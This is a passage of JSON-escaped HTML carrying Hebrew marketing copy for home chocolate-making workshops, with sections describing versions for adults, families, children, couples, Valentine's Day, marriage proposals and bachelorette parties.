\\u05dc\\u05d8\\u05e2\\u05dd \\u05d4\\u05db\\u05dc\\u05dc\\u05d9 \\u05e9\\u05dc \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d1\\u05d9\\u05ea, \\u05de\\u05d4 \\u05d6\\u05d4 \\u05d0\\u05d5\\u05de\\u05e8?<\\/h2><p>\\u05dc\\u05de\\u05e2\\u05e9\\u05d4 \\u05de\\u05d3\\u05d5\\u05d1\\u05e8 \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d9\\u05d9\\u05d7\\u05d5\\u05d3\\u05d9\\u05ea \\u05d5\\u05d8\\u05e2\\u05d9\\u05de\\u05d4 \\u05e9\\u05ea\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05e2\\u05e9\\u05d5\\u05ea \\u05d0\\u05e6\\u05dc\\u05db\\u05dd \\u05d1\\u05d1\\u05d9\\u05ea. <br \\/>\\u05db\\u05dc \\u05e1\\u05d3\\u05e0\\u05d4 \\u05de\\u05d5\\u05ea\\u05d0\\u05de\\u05ea \\u05dc\\u05de\\u05d0\\u05d5\\u05e8\\u05e2, \\u05dc\\u05d0\\u05d5\\u05e4\\u05d9 \\u05d4\\u05de\\u05e9\\u05ea\\u05ea\\u05e4\\u05d9\\u05dd \\u05d5\\u05dc\\u05db\\u05de\\u05d5\\u05ea \\u05d4\\u05de\\u05e9\\u05ea\\u05ea\\u05e4\\u05d9\\u05dd \\u05d1\\u05e1\\u05d3\\u05e0\\u05d4 \\u05e2\\u05e6\\u05de\\u05d4 (\\u05dc\\u05de\\u05e9\\u05dc, \\u05e0\\u05d9\\u05ea\\u05df \\u05dc\\u05e2\\u05e8\\u05d5\\u05da \\u05d1\\u05d1\\u05d9\\u05ea \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d6\\u05d5\\u05d2\\u05d5\\u05ea, \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9\\u05ea, \\u05dc\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd \\u05d5\\u05e2\\u05d5\\u05d3), \\u05d1\\u05db\\u05dc \\u05e1\\u05d3\\u05e0\\u05d4 \\u05ea\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05dc\\u05de\\u05d5\\u05d3 \\u05db\\u05d9\\u05e6\\u05d3 \\u05dc\\u05e0\\u05e6\\u05dc \\u05d0\\u05ea \\u05d7\\u05d5\\u05de\\u05e8\\u05d9 \\u05d4\\u05d2\\u05dc\\u05dd \\u05e9\\u05d9\\u05e9 \\u05dc\\u05db\\u05dd \\u05d1\\u05de\\u05e7\\u05e8\\u05e8 \\u05d1\\u05d1\\u05d9\\u05ea, \\u05d5\\u05de\\u05d5\\u05e6\\u05e8\\u05d9 \\u05d4\\u05d0\\u05e4\\u05d9\\u05d4 \\u05e9\\u05d9\\u05e9 \\u05d1\\u05db\\u05dc \\u05d0\\u05e8\\u05d5\\u05df, \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e8\\u05e9\\u05d9\\u05de\\u05d9\\u05dd \\u05d5\\u05d8\\u05e2\\u05d9\\u05de\\u05d9\\u05dd.<\\/p><p>\\u05dc\\u05de\\u05e2\\u05e9\\u05d4 \\u05dc\\u05d0 \\u05e6\\u05e8\\u05d9\\u05da \\u05d4\\u05db\\u05e0\\u05d4 \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05ea, \\u05d5\\u05dc\\u05d0 \\u05ea\\u05d0\\u05dc\\u05e6\\u05d5 \\u05dc\\u05e8\\u05db\\u05d5\\u05e9 \\u05de\\u05d5\\u05e6\\u05e8\\u05d9\\u05dd \\u05d1\\u05d0\\u05d5\\u05e4\\u05df \\u05de\\u05d9\\u05d5\\u05d7\\u05d3. <br \\/>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d1\\u05d9\\u05ea \\u05de\\u05d5\\u05ea\\u05d0\\u05de\\u05ea \\u05dc\\u05de\\u05d5\\u05e6\\u05e8\\u05d9\\u05dd \\u05e9\\u05d9\\u05e9 \\u05dc\\u05db\\u05dd \\u05d1\\u05d1\\u05d9\\u05ea, \\u05dc\\u05ea\\u05e0\\u05d5\\u05e8 \\u05d4\\u05d1\\u05d9\\u05ea\\u05d9, \\u05dc\\u05de\\u05d9\\u05e7\\u05e1\\u05e8, \\u05dc\\u05de\\u05d8\\u05e8\\u05e4\\u05d4 \\u05d5\\u05d0\\u05e4\\u05d9\\u05dc\\u05d5 \\u05dc\\u05de\\u05e7\\u05e8\\u05e8 \\u05d4\\u05d1\\u05d9\\u05ea\\u05d9, \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05e9\\u05ea\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05e9\\u05d5\\u05d1 \\u05d5\\u05dc\\u05e9\\u05d7\\u05d6\\u05e8 \\u05d0\\u05ea \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05dc\\u05d1\\u05d3\\u05db\\u05dd.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd, \\u05dc\\u05d0\\u05d9\\u05e8\\u05d5\\u05e2\\u05d9\\u05dd \\u05d4\\u05d7\\u05e9\\u05d5\\u05d1\\u05d9\\u05dd \\u05d1\\u05d7\\u05d9\\u05d9\\u05dd<\\/h2><p>\\u05dc\\u05d0 \\u05de\\u05e2\\u05d8 \\u05d0\\u05e0\\u05e9\\u05d9\\u05dd \\u05d1\\u05d5\\u05d7\\u05e8\\u05d9\\u05dd \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05dc\\u05d7\\u05d2\\u05d5\\u05d2 \\u05d0\\u05d9\\u05e8\\u05d5\\u05e2\\u05d9\\u05dd \\u05d7\\u05e9\\u05d5\\u05d1\\u05d9\\u05dd \\u05d1\\u05d7\\u05d9\\u05d9\\u05dd. <br \\/>\\u05ea\\u05d7\\u05e9\\u05d1\\u05d5 \\u05e2\\u05dc \\u05d6\\u05d4 \\u05e8\\u05d2\\u05e2. \\u05de\\u05d4 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05db\\u05d9\\u05e3, \\u05de\\u05d4\\u05e0\\u05d4 \\u05d5\\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05de\\u05dc\\u05d7\\u05d2\\u05d5\\u05d2 \\u05e2\\u05dd \\u05d4\\u05d0\\u05d4\\u05d5\\u05d1\\u05d9\\u05dd \\u05e9\\u05dc\\u05db\\u05dd \\u05d5\\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05d8\\u05e2\\u05d9\\u05de\\u05d9\\u05dd? \\u05de\\u05d4 \\u05d9\\u05db\\u05d5\\u05dc \\u05dc\\u05d4\\u05d9\\u05d5\\u05ea \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05d4\\u05e0\\u05d4 \\u05de\\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d0\\u05ea \\u05d4\\u05db\\u05d9\\u05d1\\u05d5\\u05d3 \\u05e9\\u05d0\\u05d5\\u05ea\\u05d5 \\u05ea\\u05d0\\u05db\\u05dc\\u05d5 \\u05dc\\u05d2\\u05de\\u05e8\\u05d9 \\u05d1\\u05e2\\u05e6\\u05de\\u05db\\u05dd? \\u05de\\u05d4 \\u05d9\\u05db\\u05d5\\u05dc \\u05dc\\u05d4\\u05d9\\u05d5\\u05ea \\u05db\\u05d9\\u05e3 \\u05d5\\u05de\\u05ea\\u05d5\\u05e7 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05e9\\u05d9\\u05dc\\u05d5\\u05d1 \\u05e9\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05e9\\u05de\\u05d7\\u05d4 \\u05e9\\u05dc\\u05db\\u05dd?<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9\\u05ea, \\u05dc\\u05e6\\u05d1\\u05d5\\u05e8 \\u05d7\\u05d5\\u05d5\\u05d9\\u05d5\\u05ea \\u05d9\\u05d7\\u05d3<\\/h2><p>\\u05de\\u05e9\\u05e4\\u05d7\\u05d5\\u05ea \\u05e8\\u05d1\\u05d5\\u05ea \\u05d1\\u05d5\\u05d7\\u05e8\\u05d5\\u05ea \\u05dc\\u05e2\\u05e8\\u05d5\\u05da \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9\\u05ea \\u05d0\\u05e6\\u05dc\\u05dd \\u05d1\\u05d1\\u05d9\\u05ea. <br \\/>\\u05d9\\u05e9\\u05e0\\u05dd \\u05dc\\u05d0 \\u05de\\u05e2\\u05d8 \\u05de\\u05e9\\u05e4\\u05d7\\u05d5\\u05ea \\u05d7\\u05d5\\u05d1\\u05d1\\u05d5\\u05ea \\u05d0\\u05d5\\u05db\\u05dc, \\u05e2\\u05dd \\u05d6\\u05d9\\u05e7\\u05d4 \\u05dc\\u05de\\u05d8\\u05d1\\u05d7 \\u05d5\\u05d0\\u05d4\\u05d1\\u05d4 \\u05dc\\u05d7\\u05d5\\u05de\\u05e8\\u05d9 \\u05d4\\u05d2\\u05dc\\u05dd \\u05d4\\u05e9\\u05d5\\u05e0\\u05d9\\u05dd, \\u05e9\\u05d9\\u05db\\u05d5\\u05dc\\u05d5\\u05ea \\u05d1\\u05d4\\u05d7\\u05dc\\u05d8 \\u05dc\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d4\\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05d4\\u05d6\\u05d5.<\\/p><p>\\u05de\\u05e9\\u05e4\\u05d7\\u05d5\\u05ea \\u05e9\\u05de\\u05d7\\u05e4\\u05e9\\u05d5\\u05ea \\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05e7\\u05e6\\u05ea \\u05e9\\u05d5\\u05e0\\u05d4 \\u05d5\\u05d0\\u05d7\\u05e8\\u05ea, \\u05d6\\u05de\\u05df \\u05d2\\u05d9\\u05d1\\u05d5\\u05e9 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9, \\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05d9\\u05d5\\u05e6\\u05d0\\u05ea \\u05d3\\u05d5\\u05e4\\u05df, \\u05d5\\u05dc\\u05e9\\u05dc\\u05d1 \\u05d0\\u05ea \\u05d4\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05d1\\u05d0\\u05d5\\u05e4\\u05df \\u05de\\u05dc\\u05d0, \\u05d9\\u05db\\u05d5\\u05dc\\u05d5\\u05ea \\u05dc\\u05d2\\u05de\\u05e8\\u05d9 \\u05dc\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05e1\\u05d3\\u05e0\\u05d4 \\u05e9\\u05de\\u05ea\\u05d0\\u05d9\\u05de\\u05d4 \\u05dc\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd \\u05d5\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05db\\u05d0\\u05d7\\u05d3, \\u05d5\\u05dc\\u05e9\\u05de\\u05d5\\u05d7 \\u05d1\\u05ea\\u05d5\\u05e6\\u05e8\\u05d9\\u05dd \\u05de\\u05e9\\u05d5\\u05ea\\u05e4\\u05d9\\u05dd \\u05e9\\u05d4\\u05db\\u05d9\\u05e0\\u05d5 \\u05d9\\u05d7\\u05d3.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd, \\u05d2\\u05df \\u05e2\\u05d3\\u05df \\u05e9\\u05dc \\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd<\\/h2><p>\\u05d9\\u05e9 \\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05e9\\u05d9\\u05e9 \\u05dc\\u05d4\\u05dd \\u05d0\\u05d4\\u05d1\\u05d4 \\u05d2\\u05d3\\u05d5\\u05dc\\u05d4 \\u05de\\u05d0\\u05d5\\u05d3 \\u05dc\\u05de\\u05d8\\u05d1\\u05d7. \\u05d4\\u05dd \\u05e0\\u05d4\\u05e0\\u05d9\\u05dd \\u05dc\\u05e2\\u05de\\u05d5\\u05d3 \\u05dc\\u05e6\\u05d3 \\u05d4\\u05d4\\u05d5\\u05e8\\u05d9\\u05dd, \\u05dc\\u05e9\\u05d7\\u05e7 \\u05e2\\u05dd \\u05d7\\u05d5\\u05de\\u05e8\\u05d9 \\u05d4\\u05d2\\u05dc\\u05dd \\u05d5\\u05de\\u05d0\\u05ea\\u05d2\\u05e8\\u05d9\\u05dd \\u05d0\\u05ea \\u05e2\\u05e6\\u05de\\u05dd \\u05dc\\u05dc\\u05de\\u05d5\\u05d3 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05de\\u05d0\\u05db\\u05dc\\u05d9\\u05dd \\u05d1\\u05d0\\u05d5\\u05e4\\u05df \\u05e2\\u05e6\\u05de\\u05d0\\u05d9. \\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05e9\\u05de\\u05d5\\u05e6\\u05d0\\u05d9\\u05dd \\u05d0\\u05d4\\u05d1\\u05d4 \\u05d2\\u05d3\\u05d5\\u05dc\\u05d4 \\u05de\\u05d0\\u05d5\\u05d3 \\u05dc\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd \\u05d9\\u05db\\u05d5\\u05dc\\u05d9\\u05dd \\u05dc\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d0\\u05d5\\u05d3 \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd. \\u05d0\\u05dd \\u05d9\\u05e9 \\u05dc\\u05db\\u05dd \\u05d9\\u05d5\\u05dd \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea \\u05d0\\u05d5 \\u05d1\\u05ea \\u05de\\u05e6\\u05d5\\u05d5\\u05d4 \\u05e9\\u05de\\u05ea\\u05e7\\u05e8\\u05d1\\u05ea, \\u05ea\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05d4\\u05d6\\u05de\\u05d9\\u05df \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d9\\u05ea\\u05d9\\u05ea \\u05db\\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea, \\u05d5\\u05dc\\u05d0\\u05e8\\u05d2\\u05df \\u05dc\\u05d9\\u05dc\\u05d3 \\u05e9\\u05dc\\u05db\\u05dd \\u05d7\\u05d2\\u05d9\\u05d2\\u05d4 \\u05e9\\u05dc\\u05d0 \\u05d9\\u05e9\\u05db\\u05d7.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea, \\u05dc\\u05d6\\u05d5\\u05d2\\u05d5\\u05ea \\u05e9\\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd<\\/h2><p>\\u05d1\\u05e0\\u05d9 \\u05d6\\u05d5\\u05d2 \\u05e9\\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05dc\\u05d9\\u05e6\\u05d5\\u05e8 \\u05d9\\u05d7\\u05d3, \\u05e9\\u05e0\\u05d4\\u05e0\\u05d9\\u05dd \\u05dc\\u05e2\\u05de\\u05d5\\u05d3 \\u05d9\\u05d7\\u05d3 \\u05d1\\u05de\\u05d8\\u05d1\\u05d7, \\u05dc\\u05e4\\u05e0\\u05e7 \\u05d0\\u05d7\\u05d3 \\u05d0\\u05ea \\u05d4\\u05e9\\u05e0\\u05d9 \\u05d1\\u05de\\u05d8\\u05e2\\u05de\\u05d9\\u05dd, \\u05d5\\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05dc\\u05e2\\u05e6\\u05de\\u05dd \\u05d0\\u05e8\\u05d5\\u05d7\\u05d5\\u05ea \\u05de\\u05d5\\u05e9\\u05e7\\u05e2\\u05d5\\u05ea \\u05d5\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05de\\u05e4\\u05e0\\u05e7\\u05d9\\u05dd, \\u05d5\\u05d3\\u05d0\\u05d9 \\u05d9\\u05de\\u05e6\\u05d0\\u05d5 \\u05e2\\u05e0\\u05d9\\u05d9\\u05df \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea.<\\/p><p>\\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d1\\u05e0\\u05d5\\u05d9\\u05d4 \\u05db\\u05da \\u05e9\\u05ea\\u05db\\u05d9\\u05e0\\u05d5 \\u05d9\\u05d7\\u05d3 \\u05e9\\u05dc\\u05dc \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05d9\\u05dd \\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd, \\u05ea\\u05dc\\u05de\\u05d3\\u05d5 \\u05e2\\u05dc \\u05d7\\u05d5\\u05de\\u05e8 \\u05d4\\u05d2\\u05dc\\u05dd \\u05d4\\u05d6\\u05d4, \\u05e2\\u05dc \\u05d4\\u05d9\\u05db\\u05d5\\u05dc\\u05d5\\u05ea \\u05e9\\u05dc\\u05d5 \\u05d5\\u05e2\\u05dc \\u05d4\\u05d3\\u05e8\\u05da \\u05dc\\u05e0\\u05e6\\u05dc \\u05d0\\u05ea \\u05d4\\u05d8\\u05e2\\u05dd \\u05d5\\u05d4\\u05d0\\u05e8\\u05d5\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d9\\u05dd \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05dc\\u05d4\\u05d5\\u05e6\\u05d9\\u05d0 \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05de\\u05d5\\u05e9\\u05dc\\u05de\\u05d9\\u05dd. <br \\/>\\u05d6\\u05d5\\u05d2\\u05d5\\u05ea \\u05e9\\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05d9\\u05dd \\u05de\\u05d5\\u05e9\\u05d7\\u05ea\\u05d9\\u05dd \\u05d5\\u05de\\u05e4\\u05e0\\u05e7\\u05d9\\u05dd \\u05d9\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05d4\\u05d6\\u05de\\u05d9\\u05df \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d6\\u05d5\\u05d2 \\u05e9\\u05ea\\u05dc\\u05de\\u05d3 \\u05d0\\u05d5\\u05ea\\u05dd \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d0\\u05ea \\u05d4\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd \\u05d4\\u05db\\u05d9 \\u05de\\u05d8\\u05e8\\u05d9\\u05e4\\u05d9\\u05dd \\u05e9\\u05d9\\u05e9.\\u00a0<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d0\\u05d4\\u05d1\\u05d4, \\u05e1\\u05d3\\u05e0\\u05d4 \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05ea \\u05d1\\u05de\\u05d9\\u05e0\\u05d4<\\/h2><p>\\u05d0\\u05d7\\u05ea \\u05d4\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05d4\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d5\\u05ea \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8 \\u05d4\\u05d9\\u05d0 \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d0\\u05d4\\u05d1\\u05d4. <br \\/>\\u05d6\\u05d5\\u05d2\\u05d5\\u05ea \\u05e8\\u05d1\\u05d9\\u05dd \\u05d1\\u05d5\\u05d7\\u05e8\\u05d9\\u05dd \\u05dc\\u05d7\\u05d2\\u05d5\\u05d2 \\u05d0\\u05ea \\u05d4\\u05d9\\u05d5\\u05dd \\u05d4\\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05d4\\u05d6\\u05d4 \\u05d1\\u05d3\\u05e8\\u05da \\u05e7\\u05e6\\u05ea \\u05e4\\u05d7\\u05d5\\u05ea \\u05e9\\u05d9\\u05d2\\u05e8\\u05ea\\u05d9\\u05ea \\u05d5\\u05d4\\u05e8\\u05d1\\u05d4 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05d7\\u05d5\\u05d5\\u05d9\\u05ea\\u05d9\\u05ea.<\\/p><p>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d0\\u05d4\\u05d1\\u05d4 \\u05d4\\u05d9\\u05d0 \\u05e1\\u05d3\\u05e0\\u05d4 \\u05de\\u05e4\\u05e0\\u05e7\\u05ea, \\u05de\\u05ea\\u05d5\\u05e7\\u05d4 \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3, \\u05de\\u05d5\\u05e9\\u05d7\\u05ea\\u05ea, \\u05d5\\u05de\\u05ea\\u05d1\\u05e1\\u05e1\\u05ea \\u05db\\u05d5\\u05dc\\u05d4 \\u05e2\\u05dc \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e8\\u05d5\\u05de\\u05e0\\u05d8\\u05d9\\u05dd \\u05d5\\u05de\\u05e2\\u05d5\\u05e8\\u05e8\\u05d9 \\u05ea\\u05d0\\u05d1\\u05d4. \\u05ea\\u05dc\\u05de\\u05d3\\u05d5 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d9\\u05d7\\u05d3 \\u05d0\\u05ea \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05d4\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8, \\u05d5\\u05d4\\u05db\\u05dc \\u05d1\\u05d0\\u05d5\\u05d5\\u05d9\\u05e8\\u05d4 \\u05e8\\u05d5\\u05de\\u05e0\\u05d8\\u05d9\\u05ea \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05de\\u05e4\\u05e0\\u05e7\\u05ea.<\\/p><h2>\\u05d4\\u05e6\\u05e2\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d4\\u05e6\\u05e2\\u05d4 \\u05de\\u05ea\\u05d5\\u05e7\\u05d4 \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3<\\/h2><p>\\u05de\\u05d9 \\u05de\\u05db\\u05dd \\u05e9\\u05de\\u05d7\\u05e4\\u05e9 \\u05e8\\u05e2\\u05d9\\u05d5\\u05e0\\u05d5\\u05ea \\u05dc\\u05d4\\u05e6\\u05e2\\u05d5\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df \\u05de\\u05e7\\u05d5\\u05e8\\u05d9\\u05d5\\u05ea, \\u05de\\u05d5\\u05d6\\u05de\\u05df \\u05dc\\u05ea\\u05db\\u05e0\\u05df \\u05d4\\u05e6\\u05e2\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3. <br \\/>\\u05d9\\u05e9\\u05e0\\u05df \\u05dc\\u05d0 \\u05de\\u05e2\\u05d8 \\u05d3\\u05e8\\u05db\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d5\\u05ea \\u05d5\\u05de\\u05e7\\u05d5\\u05e8\\u05d9\\u05d5\\u05ea \\u05dc\\u05d4\\u05e6\\u05d9\\u05e2 \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df, \\u05d5\\u05db\\u05dc \\u05d4\\u05e6\\u05e2\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df \\u05d4\\u05d9\\u05d0 \\u05e8\\u05d5\\u05de\\u05e0\\u05d8\\u05d9\\u05ea \\u05d5\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05ea, \\u05d0\\u05d1\\u05dc \\u05d4\\u05e6\\u05e2\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df \\u05d1\\u05de\\u05d4\\u05dc\\u05da \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05d0\\u05d5 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9\\u05ea, \\u05db\\u05e9\\u05d4\\u05d8\\u05d1\\u05e2\\u05ea \\u05e6\\u05e6\\u05d4 \\u05e4\\u05ea\\u05d0\\u05d5\\u05dd \\u05de\\u05ea\\u05d5\\u05da \\u05d0\\u05d7\\u05d3 \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd, \\u05d4\\u05d9\\u05d0 \\u05d1\\u05d4\\u05d7\\u05dc\\u05d8 \\u05de\\u05d7\\u05d5\\u05d5\\u05d4 \\u05e8\\u05d5\\u05de\\u05e0\\u05d8\\u05d9\\u05ea \\u05d5\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05ea \\u05e9\\u05dc\\u05d0 \\u05ea\\u05e9\\u05db\\u05d7 \\u05dc\\u05e2\\u05d5\\u05dc\\u05dd.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea \\u05de\\u05d3\\u05dc\\u05d9\\u05e7\\u05d4 \\u05d5\\u05de\\u05e7\\u05d5\\u05e8\\u05d9\\u05ea<\\/h2><p>\\u05d0\\u05dd \\u05d0\\u05ea\\u05df \\u05e2\\u05d5\\u05de\\u05d3\\u05d5\\u05ea \\u05dc\\u05d4\\u05ea\\u05d7\\u05ea\\u05df \\u05de\\u05de\\u05e9 \\u05d1\\u05e7\\u05e8\\u05d5\\u05d1, \\u05d5\\u05de\\u05d7\\u05e4\\u05e9\\u05d5\\u05ea \\u05e8\\u05e2\\u05d9\\u05d5\\u05e0\\u05d5\\u05ea \\u05dc\\u05d7\\u05d2\\u05d5\\u05d2 \\u05e2\\u05dd \\u05d4\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d4\\u05d8\\u05d5\\u05d1\\u05d5\\u05ea, \\u05d4\\u05d7\\u05d2\\u05d9\\u05d2\\u05d4 \\u05e9\\u05dc\\u05db\\u05df \\u05d1\\u05d8\\u05d7 \\u05ea\\u05e9\\u05dc\\u05d1 